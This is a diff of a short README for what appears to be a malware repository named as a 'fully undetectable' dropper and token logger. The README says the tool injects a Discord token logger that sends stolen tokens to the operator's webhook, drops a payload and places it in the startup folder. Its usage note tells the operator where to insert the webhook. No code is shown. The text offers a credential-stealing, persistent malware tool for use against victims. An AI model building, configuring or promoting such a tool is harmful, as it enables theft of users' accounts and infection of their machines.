GreenShadowLegend/dropper_and_token_logger_FUD/README.md

 # Dropper_and_token_logger_FUD
 ### info:
-Injects discord with a token logger sent to your webhook, drops your payload and places it in the startup folder.
+Injects discord with a token logger sent to your webhook and drops your payload and places it in the startup folder.
 ## How to use:

 Add your webhook at line 16